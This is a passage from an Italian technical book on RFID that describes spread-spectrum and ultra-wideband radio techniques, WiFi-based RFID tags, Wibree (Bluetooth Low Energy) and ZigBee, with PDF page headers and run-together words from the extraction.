Cycle” può essere il più semplice da specificare e da realizzare ma deter-mina la limitata flessibilità e il limitato sfruttamento della banda disponi-bile. Invece, quest’ultima caratteristica deve essere massimizzata quandola disponibilità di banda (o di canali disponibili) risulta scarsa, comeavviene nelle situazioni reali.Quando ciò risulta possibile, quindi, le soluzioni basate su “Duty

Cycle” sono da evitare in favore dell’impiego di tecniche più flessibili edefficienti come quella definita dall’FCC e descritta in precedenza.

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 229

Page 221: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFIDFondamenti di una tecnologia silenziosamente pervasiva

PARTE V

ULTERIORI TECNOLOGIEDI PROSSIMITÀ

di Paolo Talone, Giuseppe RussoFondazione Ugo Bordoni

In questa parte sono presentate alcune tecnologie in qualche modo “contigue” alleapplicazioni RFID. Queste tecnologie hanno in comune tra loro la radiocomunica-zione “di prossimità”, differiscono invece per le applicazioni per le quali sono stateprogettate.Si tratta essenzialmente di due gruppi: RFID con tecnologie UWB (Ultra Wideband), RFID a standard WiFi, apparati NFC

(Near Field Communication).Si tratta di tecnologie a tutti gli effetti impiegate per applicazioni RFID, ma nonillustrate in precedenza per non appesantire la trattazione, centrata sulle tecno-logie impiegate nei sistemi a larga diffusione.

ZigBee e Wibree.Si tratta di tecnologie pensate per applicazioni differenti da RFID, ma che, per leloro caratteristiche intrinseche, potrebbero essere impiegate come TAG attivi adalte prestazioni, offrendo anche caratteristiche particolarmente innovative.Valgano come esempio le reti “mesh” realizzabili con ZigBee.

2-parteV.qxp:RFID 5-09-2008 10:58 Pagina 231

Page 222: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ233

TECNICHE A BANDA LARGA E DISPERSIONE DI SPETTRO

CENNI SUI SISTEMI A DISPERSIONE DI SPETTRO

Nell’ambito della radiocomunicazione di prossimità (Short RangeDevices - SRD) si stanno affacciando tecnologie relativamente nuove, svi-luppate negli anni ’70 e riservate, fino ad ora, ad applicazioni militari.Le tecnologie in questione fanno capo alle modulazioni di tipo a dis-

persione di spettro (Spread Spectrum - SS).Lo scopo della dispersione di spettro è quello di distribuire la potenza

del segnale su un’ampiezza di banda molto maggiore rispetto a quellanecessaria ad inviare l’informazione con modulazioni tradizionali a bandastretta.

Poiché il segnale a banda stretta e quello Spread Spectrum trasportanola stessa quantità di potenza e le stesse informazioni, la densità di poten-za di quest’ultimo è molto più bassa.L’espansione della banda avviene introducendo dei codici binari che

vengono combinati con i dati da trasmettere, per sfruttare la ridondanzadisponibile nella banda espansa. I codici utilizzati per l’espansione dibanda sono sequenze pseudocasuali, il che costituisce una caratteristicaessenziale di tali sistemi.Come detto in precedenza, la larghezza della banda a parità di poten-

za, comporta che la densità di energia sia molto bassa; questa caratteristi-ca, unita alla casualità del codice, rende il segnale simile al rumore difondo in intensità ed aspetto. La presenza di un segnale Spread Spectrumè quindi di difficile rilevazione.

V.1

V.1.1

Figura V.1Confronto tra modulazioni tradizionali

ed a dispersione di spettro

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 233

Page 223: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva234

Le intercettazioni da parte di ricevitori estranei al sistema sono pertan-to difficoltose e tale caratteristica costituisce il motivo per cui le tecnichehanno avuto origine in ambito militare.Inoltre una comunicazione a dispersione di spettro, possedendo carat-

teristiche che la rendono assimilabile a rumore di fondo, non dovrebbeinterferire con applicazioni esistenti sulle stesse bande con modulazionitradizionali. Si potrebbe quindi ipotizzare una sorta di riuso delle fre-quenze per nuove applicazioni senza interferire con quelle esistenti.Le due tecniche più comuni di modulazione Spread Spectrum sono

quella conosciuta come “Direct Sequence” (DS) e quella conosciuta come“Frequency Hopping” (FH).- Nella tecnica DS una sequenza binaria pseudocasuale con periodo infe-riore alla durata del singolo bit di dati da trasmettere viene sommatamodulo 1 (operando la funzione logica EXOR o XOR) a quella cherappresenta i dati da trasmettere.Questa operazione ha lo scopo di aumentare l’ampiezza di banda delsegnale trasmesso e dà quindi origine ad un segnale di uscita con unabanda più o meno larga in dipendenza della sequenza pseudocasuale ecentrato sulla frequenza dell’oscillatore locale del modulatore. Perdemodulare il segnale e decodificare i dati trasmessi, il ricevitore operasul segnale ricevuto con la stessa sequenza pseudocasuale usata in tra-smissione.

Figura V.2Modulazioni a dispersione di spettro:

tecnica DS

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 234

Page 224: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ235

- Nella tecnica FH, i dati da trasmettere possono essere modulati convarie modalità (a banda stretta o a banda larga). All’atto della trasmis-sione la frequenza portante del modulatore viene fatta “saltare” trabande predeterminate da una lista generata con tecnica pseudocasuale.Questo viene ottenuto pilotando un sintetizzatore di frequenza (confunzioni di oscillatore locale del modulatore) con una sequenza pseu-docasuale.Il ricevitore deve saltare tra i canali utilizzando la stessa lista usata intrasmissione.

Nelle tecnologie a dispersione di spettro, i tradizionali parametri di lar-ghezza di banda ed energia contenuta nel segnale hanno minore impor-tanza rispetto ad altri aspetti più significativi nel processo di comunicazio-ne quali l’accesso multiplo, l’anti collisione, e la robustezza alle interferen-ze. Con le tecniche a dispersione di spettro si possono infatti ottenere otti-me prestazioni per questi parametri. Questi sistemi risolvono i grandi pro-blemi di interferenza che di solito caratterizzano i canali wireless; in par-ticolare:- Sia le interferenze da rumore, sia quelle derivanti da altri segnali ven-gono minimizzate in ricezione in quanto non contengono la chiave delcodice pseudocasuale. In altri termini il ricevitore ignora tutto ciò(segnali o rumore) che non corrisponde alla rivelazione effettuata conla chiave pseudocasuale.

- Per quanto riguarda le interferenze da cammini multipli, in cui il segna-le riflesso può interferire con quello diretto, poiché la durata tempora-

Figura V.3Modulazioni a dispersione di spettro:

tecnica FH

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 235

Page 225: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva236

le dei simboli della sequenza pseudocasuale è molto minore della dura-ta del simbolo dei dati da trasmettere. Il cammino riflesso determina unritardo di propagazione tale da porre fuori sincronismo i simboli delsegnale riflesso; questi non vengono rilevati perché spostati temporal-mente rispetto alla sequenza del codice pseudo casuale.

- La tecnologia DS (Direct Sequence) ha un fattore di ridondanza costrui-to al suo interno (guadagno di processo), poiché esso trasmette contem-poraneamente diverse copie dei dati originali. Tale ridondanza fornisceimmunità agli errori di decodifica (qualsiasi sia la loro causa: interferen-ze, basso rapporto S/N, ecc.) in quanto è necessaria solo una parte deisegnali ridondanti per riassemblare correttamente i dati ricevuti.

- Un elevato guadagno di processo aumenta quindi la resistenza di unsegnale alle interferenze ed al rumore e offre inoltre una protezionecontro i cammini multipli, rendendo la trasmissione DS una soluzionemolto robusta.La tecnica DS è, in questo momento, la più diffusa e viene impiegata in

due degli standard wireless più importanti ZigBee e Wi-Fi, modulando gliimpulsi con tecnica PSK (Phase Shift Keying).

GENERALITÀ SUI SISTEMI A BANDA ULTRA LARGA

Con il termine UWB (Ultra Wide Band - Banda ultra larga) si indica unatecnologia sviluppata per trasmettere segnali modulati a dispersione dispettro su bande molto larghe, dell’ordine di 500 MHz o più. La normati-va in merito si sta sviluppando sia negli USA che in Europa (cfr.§VII.1.5).L’FCC definisce come trasmettitore UWB un “radiatore intenzionale”

che in ogni istante possiede:- una larghezza di banda uguale o superiore al 20% della frequenza cen-trale di lavoro;

- oppure una larghezza di banda uguale o superiore a 500 MHz.Vengono utilizzati impulsi in radiofrequenza di durata estremamente

ridotta (da poche decine di picosecondi a qualche nanosecondo). Questiimpulsi sono rappresentati da pochi cicli d’onda di una portante e quindilo spettro risultante è estremamente largo.

V.1.2

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 236

Page 226: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ237

La tecnologia UWB opera con le seguenti caratteristiche:• Senza portante (con impulsi formati da pochi cicli dell’onda portante).• Sfrutta una amplissima diversità in frequenza.• Come di prassi nelle tecniche a dispersione di banda, viene adoperatoun generatore di sequenze pseudocasuali, che, in questo caso, vieneusato per generare impulsi ad intervalli di tempo casuali, in modo da“mimetizzarsi” con il rumore di fondo.

• Per evitare interferenze con altre trasmissioni a modulazione tradiziona-le si tende a limitare il “Duty Cycle” degli apparati. In Europa si stannomettendo a punto normative in merito [164], [146]; l’ITU raccomandaun “Duty Cycle” del 2,4% in caso di TAG associati in movimento, del0,24% per TAG su oggetti o apparati [160], [161], [162], [163].

• Vanta forte resistenza alle interferenze per cammini multipli (multi-path) a causa della brevità dell’impulso che (come si è visto nel para-grafo precedente) minimizza il problema della interferenza tra il segna-le diretto e quelli riflessi durante il percorso.Produce quindi un segnale particolarmente adatto ad applicazioni diradiolocalizzazione (Real Time Location).

• Vanta capacità di penetrazione attraverso gli ostacoli, può quindi pre-starsi ad applicazioni di tipo radar in grado di vedere attraverso paretio attraverso il corpo umano.

• Promette comunicazioni con capacità fino a circa 1/2 Gbit/s a distanzadi qualche metro (una nuova generazione di “high bitrate PAN”).

• Ha una potenza di trasmissione talmente bassa che i segnali vengonopercepiti sotto la soglia del rumore da apparati che dovessero operare

Figura V.4Segnale impulsivo [43]

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 237

Page 227: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva238

sulle medesime bande con altri tipi di modulazione. Non si creanoquindi interferenze per le altre trasmissioni che operano con modula-zione tradizionale nelle stesse bande.

Alcune delle più usuali tecniche di modulazione utilizzate nei sistemiUWB (basati sull’emissione di impulsi di durata temporale brevissima)sono riassunte nella tabella seguente in cui sono anche elencati i relativivantaggi e svantaggi.

HIGH BITRATE PAN

Nell’ambito dell’applicazione delle tecnologie UWB a sistemi del tipoPAN (Personal Area Network) che operino con trasmissioni di prossimi-tà (SRD) sono stati sviluppati metodi di trasmissione complessi nei qualil’intera banda disponibile per le emissioni dei dispositivi UWB si suddivi-de in un certo numero di sotto bande (ciascuna delle quali di larghezzapari a circa 500 MHz) che sono opportunamente gestite in maniera coor-dinata per massimizzare le prestazioni della comunicazione.

Figura V.5Distorsione del segnale per cammini multipli

in una modulazione DSSS (WiFi 802.11)(a sinistra) e in una modulazione UWB

(a destra) [27]

Tabella V.1Confronto tra tecniche di modulazione UWB

[50]

V.1.3

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 238

Page 228: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ239

Tuttavia l’attività di standardizzazione in tale ambito non ha, ad oggi,condotto a definire un approccio univoco. Tale era infatti l’obiettivo ini-ziale di un gruppo di lavoro ad hoc attivato in ambito IEEE (802.15.3atask group - TG3a).I lavori del gruppo hanno portato all’emissione, nel dicembre 2002, di

una Call For Intent/Call For Proposal (CFI/CFP) relativamente alla defini-zione dello strato fisico di un sistema UWB. Le molteplici proposte ricevutesono state fatte progressivamente convergere verso due approcci differenti:- Direct Sequence UWB [22]appoggiato dal consorzio di aziende che fa capo al UWB Forum[http://www.uwbforum.org];

- Multi-band Orthogonal Frequency Division Multiplexing [23]sostenuto dalle aziende facenti capo alla WIMedia Association[http://www.wimedia.org].Il gruppo TG3a non è stato in grado di giungere ad una decisione su

quale tra i due approcci includere nello standard. L’impossibilità di raggiun-gere un accordo ha condotto il TG3a ad approvare, a fine 2005, la richiestadi ritirare la cosiddetta Project Authorization Request (PAR) effettuata nelgennaio 2003 relativa alla creazione dello standard in questione.I due consorzi di aziende UWB Forum e WIMedia Association hanno

comunque recentemente affermato che le relative aziende continuerannolo sviluppo di prodotti UWB commerciali con le proprie tecnologie.La proposta basata su Multi-band Orthogonal Frequency Division

Multiplexing fa attualmente parte di standard ECMA (EuropeanComputer Manufacurers Association) finalizzati nel dicembre 2005(ECMA-368 e ECMA-369).

DIRECT SEQUENCE UWB (UWB FORUM) [22]Il sistema “Direct Sequence Spread Spectrum”, conosciuto anche come“Direct Sequence Code Division Multiple Access” (DS-CDMA), puòoperare in due bande indipendenti: la prima da 3,1 GHz a 4,85 GHz(banda bassa), la seconda da 6,2 GHz a 9,7 GHz (banda alta).All’interno di ciascuna banda sono supportati fino a 6 canali con codici

V.1.4

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 239

Page 229: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva240

di accesso e frequenze di lavoro univoche. Un dispositivo conforme allostandard deve supportare obbligatoriamente i canali da 1 a 4 che sono quel-li a frequenze più basse mentre il supporto dei canali 5-12 è opzionale.Il sistema è basato sullo spreading diretto di due possibili tipi di

sequenze, utilizzate per trasmettere simboli, ciascuno costituito da unasequenza di impulsi UWB:- BPSK (binary phase shift keying),in cui il bit di dati determina semplicemente con quale polarità (+-) ètrasmesso il relativo codice spreading della lunghezza desiderata.

- 4-BOK o Q-BOK (quaternary bi-orthogonal keying),in cui ogni simbolo trasferisce due bit di dati. La configurazione di ognicoppia di bit quindi corrisponde ad uno tra due codici spreading relativialla velocità di trasmissione desiderata e ne determina anche la polarità.Pertanto con il BPSK ogni simbolo trasmesso corrisponde a un bit, con

4-BOK ogni simbolo corrisponde a due bit.Differenti velocità di trasmissione sono ottenute attraverso l’uso di

codici di spreading a lunghezza variabile (da 1 a 24).È prevista inoltre una codifica con correzione d’errore (FEC) convolu-

zionale avente un rapporto di 1/2 o di 3/4.Le velocità di trasmissione supportate dal sistema sono di 28, 55, 110,

220, 500, 660,1000 and 1320 Mbit/s.Il supporto del metodo BPSK è obbligatorio mentre per il 4-BOK è

obbligatoria la trasmissione ma la ricezione è opzionale.Questo è giustificato dal fatto che in alcune applicazioni l’uso del 4-

BOK consente di ottenere prestazioni più elevate in particolari situazioni.Inoltre la complessità aggiuntiva (e quindi il costo) necessaria per la

generazione di segnali 4-BOK rispetto a quanto già previsto per il BPSKrisulta bassa.

MULTI-BAND ORTHOGONAL FREQUENCY DIVISION MULTIPLEXING

(WIMEDIA ALLIANCE) [23]Le velocità di trasmissione supportate dal sistema sono di 53,3, 55, 80,106,67, 110, 160, 200, 320, e 480 Mbit/s.

V.1.5

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 240

Page 230: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ241

In particolare la capacità di trasmettere e ricevere alle velocità di 53,3,106.,67, 110, e 200 Mbit/s è una caratteristica che tutti i dispositivi devo-no obbligatoriamente possedere.

Il sistema è basato su una sorta di modulazione OFDM con l’impiegodi 122 sottoportanti non adiacenti ma sparse sulle varie bande. Per sem-plicità circuitale, le sottoportanti sono modulate solo con tecnica QPSK.Viene utilizzata una codifica con correzione d’errore (FEC) convolu-

zionale avente un rapporto di 1/3, 11/32, 1/2, 5/8, o 3/4.Il sistema proposto utilizza inoltre un cosiddetto codice tempo-fre-

quenza (TFC) per l’interleaving dei dati codificati su 3 bande di frequen-za (chiamate gruppo di bande). Sono definiti quattro gruppi di bande contre bande ciascuno e un gruppo con 2 bande. Ciascuna banda ha un’am-piezza di 528 MHz. Sono anche definiti 4 possibili TFC per i 4 gruppi(1÷4) di 3 bande ciascuno e 2 TFC per il gruppo 5 composto di 2 bande,in tal modo da poter avere 4 canali logici per banda (due per la banda 5)per un totale di 18 canali logici separati.

I dispositivi operanti nel gruppo di bande 1 (le tre bande a frequenzapiù bassa) sono identificati come dispositivi Modo 1. È obbligatorio chetutti i dispositivi siano in grado di operare in Modo 1, il supporto deglialtri gruppi di bande risulta opzionale.I gruppi di bande così definiti sarebbero dedicati, nella proposta, a

classi di applicazioni differenti (ad esempio applicazioni a lungo raggio edapplicazioni a corto raggio, ad esempio gli SRD).

Figura V.6Multi-band OFDM: bande di frequenza

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 241

Page 231: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva242

Per poter leggere i dati, il dispositivo ricevente deve essere sincronizza-to con la trasmissione, conoscendo a quali intervalli di tempo e su qualifrequenze i dati saranno trasmessi. Se il ricevente non è sincronizzato, nonpuò distinguere una trasmissione Ultra Wide Band dal rumore di fondo.

APPLICAZIONI A TAG PASSIVI RFID

Nei sistemi SRD, possono essere impiegate tecniche di modulazioneSpread Spectrum (non UWB) in banda UHF. Per queste frequenze lenorme USA ammettono potenze d’emissione più alte per i sistemi SSrispetto a quelli a banda stretta.La potenza è distribuita in una banda molto larga, riducendo l’eventua-

lità di interferenze dannose da e verso altri sistemi.Nei sistemi con TAG passivi RFID a basso costo le tecniche Spread

Spectrum sono spesso utilizzate in maniera differente da quanto sopraesposto.Infatti per ottenere una vera modulazione DS o FH è necessaria una

elevata complessità del TAG. Invece quest’ultimo continua, come di con-sueto, a lavorare modulando il backscatter, con la differenza che l’anten-na ha una larghezza di banda che copre l’intera banda del segnale spreadspectrum. In tal modo il TAG è in grado di ricevere tutta la potenza pro-veniente sia da un segnale a banda stretta che salta con tecnica FH sia daun segnale a banda larga generato con tecnica DS.In entrambi i casi, però, i segnali devono esere tutti modulati in

ampiezza dal Reader per consentire al TAG di operare il backscatter.

Figura V.7Multi-band OFDM: intervalli di tempoe frequenze nella trasmissione dei dati

(due periodi temporali relativi ad uno deicodici TFC).

V.1.6

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 242

Page 232: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ243

APPLICAZIONI A TAG ATTIVI RFID

Esistono anche sistemi con TAG attivi RFID basati su tecnologia UWB.Questi differiscono dai tradizionali sistemi RFID che utilizzano percomunicare singole porzioni di banda nello spettro radio. I sistemi UWBtrasmettono segnali radio di brevissima durata temporale e con spettroche può estendersi dai 3,1GHz ai 10,6 GHz.Gli RFID UWB trovano impiego oltre che nel consueto campo dell’i-

dentificazione anche in quello dei sistemi di radiolocalizzazione (RTLS).Ad esempio, per gli ospedali è stata studiata una soluzione che permet-

te di localizzare le cartelle cliniche, i pazienti e i farmaci in modo da evi-tare errori nelle somministrazioni dei farmaci e delle cure.Dotando di una piccola etichetta ogni oggetto, ogni paziente e tutto il

personale di un ospedale, tramite Ultra Wide Band è possibile in qualsia-si momento rilevarne la posizione e quindi evitare lo smarrimento o loscambio delle cartelle cliniche, verificare quali pazienti sono in sala ope-ratoria ed incrociando i dati con la cartella clinica stabilire se vi sia unerrore, ovvero se il tipo di operazione sia quella prescritta o meno ecc. Nelparagrafo seguente vengono citati esempi di applicazioni UWB realizzatein Italia.

1.7.1 Applicazioni italiane UWB

Varie applicazioni, che mettono in luce le prestazioni dei sistemi UWBper il tracciamento di oggetti in tempo reale, sono state di recente realiz-zate in Italia: si tratta di localizzare in tempo reale giocatori ed oggetti inmovimento (palla) in eventi sportivi che si svolgono in spazi circoscritti(campi di calcio: [http://www.eximia.it], campo di hockey: [42], ecc.).Le caratteristiche principali di una di queste applicazioni sono:

• Lettura di TAG a distanze dai ricevitori di oltre 200 m in spazi aperti edi oltre 50 m attraverso ostacoli multipli.

• Al massimo 32 ricevitori per Unità di Base.• Durata della batteria di oltre 4,5 anni, con TAG funzionanti ad un“ping” al secondo (1Hz).

• Precisione di localizzazione in tempo reale al di sotto dei 30 cm, miglio-rabile a 10 cm mediante algoritmi di minimizzazione dell’errore.

V.1.7

Figura V.8Esempio di sistema UWB – MultispectralSolutions: Ultra Wideband (UWB) system

(Digital Active RFID &Tracking) for precisionasset tracking and real-time localization

Reader UWB e sistema di gestione

TAG attivi UWB

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 243

Page 233: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva244

• Ottime prestazioni in ambienti multipath.• Dimensione dei tag: 1,2 x 2,5 x 0,6 cm.• TAG certificati UL1604 per utilizzo in ambienti “estremi” (es. raffine-rie petrolifere).

Figura V.9Applicazione UWB al calcio

[http://www.eximia.it]

Figura V.10Applicazione UWB all’Hockey [42]

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 244

Page 234: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ245

RFID A 2,45 GHz ED RFID A STANDARD WIFI

In Europa e nella gran parte del mondo, la banda in oggetto vede la pre-senza massiva di apparati radioLAN, tra cui primeggiano quelli con tec-nologia WiFi descritti nello standard IEEE 802.11a/g.La Decisione CEPT ERC/DEC/(01)07 (obbligatoria anche in Italia)

dedica la banda 2.400-2.483,5 MHz a questo scopo (caratteristiche tecni-che nell’Annesso 3 della CEPT ERC/REC 70-03), come verrà illustrato in§VII.3.2.2.Per applicazioni “Closed Loop” in ambienti in cui sono già installate,

per vari motivi, radioLAN WiFi ed in cui è programmato l’impiego di unnumero non esorbitante di TAG attivi, appare evidente la convenienza diadoperare dei TAG che comunichino rispettando la Standard WiFi.In questo caso la funzione di reader può essere svolta da software su

PC in rete ed il sistema di diffusione a radiofrequenza per far pervenire leinterrogazioni ai TAG è la radioLAN medesima.Per contro i TAG oltre a problemi di costo dovranno ottimizzare con

cura l’uso delle batterie, non potendo rimanere in permanenza in funzio-ne come le schede WiFi alimentate da PC.Nelle figure V.11 e V.12 sono illustrati due modelli di TAG WiFi com-

merciali.Va rilevato che, in linea di massima, nelle bande WiFi possono opera-

re in Europa anche sistemi RFID non conformi allo standard WiFi, siacon TAG attivi che passivi.Le Raccomandazioni europee (annesso 11 della ERC/REC 70.03, cfr.

§VII.2.3) definiscono la banda 2.446 ÷2.454 MHz tra quelle in cui posso-no operare gli RFID.Per questo tipo di tecnologia potrebbero essere usate tecnologie (pro-

tocolli, modulazioni, ecc.) differenti dal WiFi.La raccomandazione definisce infatti solo le potenze (per indoor ed

oudoor), i relativi Duty Cicle e periodi di riferimento, il diagramma diradiazione delle antenne e la necessità di un controllo automatico dipotenza.

V.2

Figura V.11TAG attivo compatibile 802.11 – AeroScout,

Inc. – Batterie al litio 3,6V (sostituibili);autonomia 2÷3 anni per trasmissione ogni 30s

Figura V.12TAG attivo compatibile 802.11 – PanGo

Networks, Inc. – per applicazioni “real-timeasset tracking”

Figura IV.13TAG passivo a 2,45 Ghz ?Intermec Inc.

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 245

Page 235: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva246

WIBREE (BLUETOOTH LOW ENERGY)

Tra le tecnologie che possono essere impiegate per realizzare apparati confunzioni RFID va citata anche una nuova proposta che si caratterizzacome un successore di Bluetooth superandone i problemi di consumo edi complessità circuitale.Wibree [http://www.wibree.com] si pone come iniziativa aperta ai pro-

duttori di apparati per estendere la connettività locale a dispositivi di pic-cole dimensioni. La tecnologia, sviluppata da Nokia per divenire comple-mentare alle altre già disponibili, è caratterizzata da un consumo energe-tico inferiore, da implementazioni di dimensioni e costi più contenuti e dafacilità di integrazione con Bluetooth.Wibree realizza connettività tra dispositivi mobili o PC e piccoli dispo-

sitivi personali quali orologi, tastiere, giocattoli, sensori per sport caratte-rizzati da sorgenti di energia (batterie) di capacità ridotte.Wibree presenta prestazioni simili a quelle di Bluetooth ed è ottimizza-

to per la minimizzazione del consumo energetico delle dimensioni dei dis-positivi e dei costi.Wibree è realizzato sia come chip stand-alone sia come chip dual-mode

Wibree-Bluetooth. I dispositivi più piccoli quali orologi o sensori sporti-vi integreranno chip di tipo stand-alone mentre i dispositivi che già pre-vedono una connettività di tipo Bluetooth con l’integrazione dei chipdual-mode potranno estendere la propria connettività a questa nuovaclasse di dispositivi personali.Riassumendo, le caratteristiche principali della tecnologia Wibree sono:

• Bassi consumi sia per quanto riguarda i picchi di assorbimento, sia peril valor medio, sia per l’apparato in stato di inattività (“idle”).

• Costi e dimensioni fisiche ridotti. Ciò comporta impatti minimi perl’inclusione della tecnologia in telefoni cellulari e PC ed, in generale,agevola la realizzazione di accessori ed apparati destinati ad impieghiHID (“human interface devices”).

• Interoperabilità semplice, intuitiva e sicura tra apparati di differentiproduttori.Il sistema tiene conto di due possibili ed egualmente importanti alter-

native di implementazione:

V.3

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 246

Page 236: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ247

• stand-alone, modalità in cui viene enfatizzata la minimizzazione delconsumo energetico e del costo per dispositivi portatili di piccoledimensioni quali orologi da polso;

• dual-mode, in cui le funzionalità Wibree sono addizionali rispetto aquelle Bluetooth con cui condividono gran parte dell’hardware circuita-le e riutilizzano la sezione RF. In tal caso quindi l’aggravio di costi rispet-to ai prodotti esistenti risulta minimo. Questa seconda modalità si rivol-ge all’implementazione in dispositivi quali telefoni cellulari e PC.Per quanto riguarda l’interfaccia a radiofrequenza, Wibree opera nella

banda ISM a 2,4 GHz con bitrate lordo di 1 Mbps e distanza operativa di5-10 m.Lo strato di collegamento (link layer) di Wibree minimizza il con-

sumo nello stato “idle”, realizza un semplice meccanismo per la sco-perta dei dispositivi presenti nel raggio di copertura radio e fornisceun servizo di trasferimento dati punto-multipunto affidabile, con fun-zionalità avanzate per il risparmio energetico e con crittografia deidati. Lo strato di collegamento fornisce inoltre i mezzi che consento-no ad uno stesso dispositivo di alternare traffico Wibree e trasmissio-ni Bluetooth.Le specifiche di Wibree sono in corso di definizione in un consorzio di

aziende, capeggiate da Nokia, tra le quali si ritrovano sia produttori disemiconduttori, sia costruttori di dispositivi, sia fornitori di servizi. Gliattuali membri del gruppo Wibree sono: Broadcom Corporation, CSR,Epson e Nordic Semiconductor che hanno rilasciato implementazioni ditecnologia Wibree su chip commerciali; Suunto e Taiyo Yuden, che con-tribuiscono alla specifiche per l’interoperabilità nelle loro rispettive areedi interesse.La tecnologia Wibree è stata resa pubblica a fine 2006 e nel giugno

2007, dopo negoziazione con Bluetooth Special Interest Group (SIG) èstato deciso di integrare le specifiche Wibree in quelle di Bluetooth comeopzione “ultra-low-power” di queste ultime, denominata “ Bluetooth lowenergy”.

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 247

Page 237: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva248

ZIGBEE

ZigBee è il nome di un’iniziativa volontaria di gruppi industriali che harealizzato le specifiche per una rete a radiofrequenza “di prossimità” cherientra nel novero delle “low bitrate” PAN (Personal Area Network) (le“high bitrate” PAN si realizzano con tecnologia UWB, cfr. §IV.1.3).Il nome deriva da “zigging bee” la danza della api domestiche, metodo

attraverso il quale vengono comunicati i dati essenziali per la sopravviven-za della colonia.ZigBee è stato concepito nel 1998, quando, per soddisfare il bisogno di

piccole reti radio autoconfiguranti ed economiche, apparve chiaro chequeste esigenze non potevano essere soddisfatte da apparati Bluetooth(ed ancor meno dal più costoso e complesso WiFi).L’alleanza industriale “ZigBee Alliance” ha avuto origine da nomi quali

Philips, Honeywell, Mitsubishi, Motorola, Invensys e molti altri si sonoaggiunti fino a superare il centinaio. Come recitano testualmente i testiintroduttivi dell’alleanza, obiettivo del progetto è: “to enable reliable,cost-effective, low power, wirelessy networked, monitoring and controlproducts based on an open global standard” ovvero uno standard apertoche permettesse a diversi apparati con funzione di attuatori, misuratori osistemi di comunicazione dati, di comunicare tra di loro attraverso unarete affidabile e dotata di misure di sicurezza per i dati, poco costosa ed abasso consumo di energia.L’alleanza industriale ha portato un contributo ai gruppi IEEE 802 col-

legati alle PAN (Personal Area Network). Nel maggio 2003 è stato quin-di rilasciato lo standard 802.15.4 che definisce i “livelli bassi” (in sensoOSI) di ZigBee, ovvero un’infrastruttura di comunicazione ed una logicadi controllo semplice e leggera dove i dispositivi sono in grado di comu-nicare tra loro in maniera autonoma.La semplicità implica anche un basso costo per chip. Questo è un

punto di forza di ZigBee, in quanto la complessità è una delle cause cheha ostacolato il consorzio Bluetooth nella diffusione massiva di reti PANbasate sul proprio standard; limitandolo, di fatto, al servizio di auricolarie mouse/tastiere. Un uso certamente importante ma secondario rispettoalle intenzioni iniziali. ZigBee infatti è una sorta di evoluzione di

V.4

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 248

Page 238: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ249

Bluetooth che ne supera i limiti principali: costo, numero massimo diapparati connessi, consumo energetico.A partire dal 2004 è iniziata la produzione di componenti elettronici

che implementano funzioni di ZigBee e permettono la realizzazione diapparati più o meno conformi. I primi prodotti ZigBee sono apparsi neisettori dell’anti-intrusione e dei telecomandi per domotica dove esisteva-no solo prodotti proprietari, con scarse funzioni di rete e non integrabilicon altri prodotti di terze parti.L’alleanza ha sviluppato anche profili di applicazioni e programmi di

certificazione. Le specifiche complete ZigBee sono state rese disponibilinel giugno 2005 [http://www.zigbee.org].Lo standard ZigBee definisce un meccanismo di comunicazione wire-

less operante su basse distanze e con una modesta banda passante: 250kbps su un raggio teorico tra i dieci e i settantacinque metri.ZigBee non intende operare in dispositivi ‘veloci’ quali apparati di rete

